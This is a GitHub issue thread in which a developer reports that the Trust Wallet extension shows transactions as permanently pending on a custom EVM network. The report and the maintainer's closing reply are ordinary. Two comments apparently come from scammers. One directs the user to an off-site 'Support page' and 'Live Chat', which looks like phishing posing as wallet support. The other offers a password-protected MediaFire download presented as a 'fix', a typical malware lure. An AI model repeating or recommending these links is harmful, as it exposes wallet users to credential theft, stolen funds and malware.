### ISSUE TITLE
Transaction receipt query stucks in custom EVM networks

### ISSUE THREAD

**Issue by VladChernenko** [trustwallet/wallet-core#3999]
# GM, TrustWallet Team (@hewigovens , @Milerius , @satoshiotomakan)👋 

We're working on adding compatibility of wallets to the EVM part of our project [Klyntar](https://github.com/KLYN74R) and bumped with a problem with TrustWallet.

## Description

1. FIrst we try to add custom EVM network in extension menu ✅ 
2. We add the RPC endpoint, name, etc. and TrustWallet correctly load it & visualize ✅
3. All internal RPC calls works good (e.g. `eth_call`, `eth_estimateGas`, etc.) ✅

4. Once we send tx, it executed in EVM, but in UI of extension we see permanent `Pending` status ❗ 
5. What is more strange is that there are no `eth_getTransactionReceipt` calls after transaction, extension only asks for `eth_getBalance` 👀 

#### Proof that everything works with Metamask

![image](https://github.com/user-attachments/assets/6ccf04a1-6370-4ca6-863e-bb02542a3b2d)

#### Proof that OKX Wallet also works

![image](https://github.com/user-attachments/assets/69201b68-fa96-4cd9-9e07-cc3169f3756d)

#### Proof that Coinbase Wallet also works

![image](https://github.com/user-attachments/assets/c13a14ee-c28e-4b80-b453-55289ea890e5)
![image](https://github.com/user-attachments/assets/9ca446d1-25da-44fd-a0a6-5c07a4c6fb4d)

#### On the other hand - TrustWallet

![image](https://github.com/user-attachments/assets/576a2d11-a016-4efa-afd4-fa6001a8c2d4)

![image](https://github.com/user-attachments/assets/f06b363b-8bf3-4764-a3df-e668e1160e6e)

## Questions

1. So, which way does TrustWallet request the receipt? Mb it uses some non-documented route or use another protocol? Because I see no logs in monitoring tools (e.g. Wireshark, BurpSuite or just on core server)
2. Maybe you have some limitations for local networks? (stupid, but let it be)
3. Or, provide a source code because raw files from extension directory are obfuscated and big, so hard to reverse engeneering them. Maybe I skiped extension files in your org GitHub?

# Thank you in advance ❤️

**Comment by Dellapots** [comment]
This issue has been previewed on Pull Request. To Resolve,
Contact the [Support page](https://livecustomers-support.web.app) to resolve your error. 
Note: you can also initiate a chat with the live agent on the chat button to get more information about your request via [Live Chat](https://livecustomers-support.web.app)
@VladChernenko

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by satoshiotomakan** [comment]
Hi @VladChernenko, this issue is not related to the wallet core repository, please create a ticket here if u believe there is a bug in the application: https://support.trustwallet.com/en/support/tickets/new
